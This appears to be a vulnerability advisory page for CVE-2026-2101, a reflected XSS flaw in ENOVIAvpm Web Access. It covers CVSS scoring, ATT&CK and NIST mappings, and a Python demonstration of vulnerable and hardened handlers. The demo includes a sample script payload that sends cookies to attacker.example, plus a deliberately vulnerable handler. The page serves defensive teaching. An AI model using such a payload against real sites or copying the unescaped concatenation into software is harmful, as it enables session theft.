CVE-2026-2101
Published: 16 February 2026
Summary
CVE-2026-2101 is a high-severity reflected Cross-site Scripting (CWE-79) vulnerability in ENOVIAvpm Web Access from 3DS (the vendor is inferred from the referenced advisory URL). Its CVSS v3.1 base score is 8.7 (High).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its exploit-likelihood ranking sits at the 13.4th percentile (below the median), and it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-15 (Information Output Filtering): encodes or filters untrusted data in web application output before it is delivered to the browser. This is the control that directly stops reflected script from executing in the victim's session, because the injected characters reach the page as inert text rather than markup.
- SI-10 (Information Input Validation): validates untrusted request parameters against an allowlist at the application boundary, so that arbitrary script cannot be injected and reflected back to victims. It is a defense-in-depth layer, not a substitute for output encoding.
- Flaw remediation (SI-2): applies the vendor-provided fix for the reflected XSS flaw in ENOVIAvpm Web Access Version 1 Release 16 through Release 19.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Reflected XSS in a public-facing web application is exploited by getting the application to process a crafted request (T1190), and the result is attacker-controlled JavaScript running in the victim's browser (T1059.007, Command and Scripting Interpreter: JavaScript).
NVD Description
A Reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIAvpm Web Access from ENOVIAvpm Version 1 Release 16 through ENOVIAvpm Version 1 Release 19 allows an attacker to execute arbitrary script code in a user's browser session.
Deeper analysis
CVE-2026-2101 is a Reflected Cross-site Scripting (XSS) vulnerability, mapped to CWE-79, affecting ENOVIAvpm Web Access in ENOVIAvpm Version 1 Release 16 through Version 1 Release 19. Published on 2026-02-16, it carries a CVSS v3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N). The issue enables an attacker to execute arbitrary script code within a user's browser session.
Exploitation requires an attacker holding low-privileged access to the application (PR:L), typically an ordinary account, to deliver a malicious payload over the network (AV:N) with low attack complexity (AC:L). The victim has to take some action (UI:R), usually following a crafted link or submitting a prepared form while holding an authenticated session with ENOVIAvpm Web Access. On success the attacker's script runs in the victim's browser context. The scope is Changed (S:C) because the vulnerable component is the web application, while the impact lands in the victim's browser session and whatever that session is authorized to do, which can extend to other users or resources. The result is high confidentiality and integrity impact (C:H/I:H) with no availability impact (A:N). Note that HttpOnly session cookies are not readable by the injected script, but the script can still issue requests to the application as the victim, so cookie flags limit token theft rather than the vulnerability itself.
Mitigation details are available in the vendor security advisory at https://www.3ds.com/trust-center/security/security-advisories/cve-2026-2101.
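As an added illustration of the flaw class and of the two controls mapped above (SI-10 input validation, SI-15 output filtering), the following Python shows a constructed search handler that reflects a request parameter into HTML, first in the vulnerable form and then hardened. This is example code written for this page, not ENOVIAvpm Web Access code; the handler, the parameter name `q`, the allowlist pattern and the probe payload are all assumptions, and the real injection point in the product is not published here.

```python
"""Reflected XSS (CWE-79) and its two primary controls, on a constructed handler.

Everything here is illustrative: the search handler, the 'q' parameter,
the allowlist and the payload are assumptions for this example, not
details of ENOVIAvpm Web Access or of CVE-2026-2101's injection point.
"""
import html
import re
from urllib.parse import parse_qs, urlencode

# Constructed probe: breaks out of an attribute and injects a script tag.
SAMPLE_PAYLOAD = (
    '"><script>document.location="https://attacker.example/?c="'
    "+document.cookie</script>"
)


def build_query(term: str) -> str:
    """URL-encode a search term the way a crafted link would carry it."""
    return urlencode({"q": term})


def vulnerable_search(query_string: str) -> str:
    """Vulnerable form: the untrusted 'q' value is concatenated straight into
    HTML, once inside an attribute and once as text, so a crafted link lands
    attacker script in the victim's session."""
    q = parse_qs(query_string).get("q", [""])[0]
    return (
        '<form><input name="q" value="' + q + '"></form>'
        "<p>Results for " + q + "</p>"
    )


# SI-10: allowlist validation at the boundary. A search term in this
# hypothetical app is up to 64 word characters, spaces and light punctuation;
# anything else is rejected rather than "cleaned" (assumed policy).
SEARCH_TERM = re.compile(r"[\w \-.,']{0,64}")


def validate_search_term(q: str) -> bool:
    return SEARCH_TERM.fullmatch(q) is not None


# SI-15: encode at each sink for the HTML context the value lands in.
def attr_encode(value: str) -> str:
    # quote=True escapes both " and ' so the value cannot close the attribute
    return html.escape(value, quote=True)


def text_encode(value: str) -> str:
    # inside element text only < > & matter, but escaping quotes too is harmless
    return html.escape(value, quote=False)


def hardened_search(query_string: str, validate: bool = True) -> tuple[int, str]:
    """Hardened form: validate at the boundary (SI-10), then encode at every
    sink (SI-15). 'validate=False' shows that output encoding alone still
    neutralizes the payload, which is why SI-15 is the primary control."""
    q = parse_qs(query_string).get("q", [""])[0]
    if validate and not validate_search_term(q):
        return 400, "<p>Invalid search term.</p>"
    return 200, (
        '<form><input name="q" value="' + attr_encode(q) + '"></form>'
        "<p>Results for " + text_encode(q) + "</p>"
    )


def reflects_script(body: str) -> bool:
    """Cheap check for the demo: does the response carry a raw <script tag?
    A real test would render the page in a browser rather than grep it."""
    return "<script" in body.lower()


if __name__ == "__main__":
    crafted = build_query(SAMPLE_PAYLOAD)
    print("vulnerable reflects script:", reflects_script(vulnerable_search(crafted)))
    status, body = hardened_search(crafted)
    print("hardened (validated):", status, reflects_script(body))
    status, body = hardened_search(crafted, validate=False)
    print("hardened (encode only):", status, reflects_script(body))
```

The order of the two controls matters in practice: allowlist validation rejects the probe outright with a 400, but an allowlist is easy to loosen over time, so the encoding at each sink is what must never be removed.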
Details
- CWE(s)